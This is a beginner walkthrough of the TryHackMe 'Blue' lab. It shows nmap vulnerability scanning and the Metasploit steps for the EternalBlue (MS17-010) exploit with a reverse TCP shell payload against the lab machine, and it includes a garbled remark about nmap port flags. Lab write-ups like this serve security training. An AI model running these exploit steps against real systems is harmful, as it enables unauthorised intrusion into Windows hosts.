TryHackMe: Blue

An educational series on Windows exploitation for complete beginners. A walkthrough.

Source: Varg — THM Profile — Instagram — Blue Merch — Twitter

Task 1: Recon

We start our recon with scanning the target machine using Nmap.

How many ports are open with a port number under 1000?

3

If you run the scan with -A flag it will scan all the ports on the host and we only need port numbers < 1000. It would be better to just specify -p 1000 to scan the first 1000 ports.

What is this machine vulnerable to? (Answer in the form of: ms??-???, ex: ms08–067)

ms17–010

To get this answer I ran nmap script which scans for the vulnerabilities on the host.

nmap --script vuln

nmap — script vuln command

Task 2: Gain Access

Start Metasploit

(To do that, type the following command in the terminal:)

msfconsole

Find the exploitation code we will run against the machine. What is the full path of the code? (Ex: exploit/……..)

exploit/windows/smb/ms17_010_eternalblue

Show options and set the one required value. What is the name of this value? (All caps for submission)

RHOSTS

Task 2 initial steps

Usually it would be fine to run this exploit as is; however, for the sake of learning, you should do one more thing before exploiting the target. Enter the following command and press enter:

set payload windows/x64/shell/reverse_tcp

With that done, run the exploit!

run

set payload and run the exploit

Confirm that the exploit has run correctly. You may have to press enter for the DOS shell to appear. Background this shell…